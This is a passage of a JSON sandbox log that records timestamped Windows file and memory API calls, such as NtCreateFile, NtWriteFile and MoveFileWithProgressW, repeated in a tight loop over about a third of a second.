"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,146", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,146", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,156", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,156", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,166", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,166", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,176", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,176", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,186", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,186", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,196", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,196", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,206", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,206", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,216", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,216", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,226", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,226", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,236", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,236", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,246", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,246", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,256", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,256", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,266", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,266", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,276", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,276", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,286", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,286", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,296", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,296", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,306", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,306", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,336", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,336", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,346", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,346", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,356", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,356", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,366", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,366", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,376", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,376", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,386", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,386", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,396", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,396", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,406", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,406", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,416", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,416", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,426", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,426", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,436", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,436", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,446", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,446", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,456", "api": "NtSetInformationFile"}, 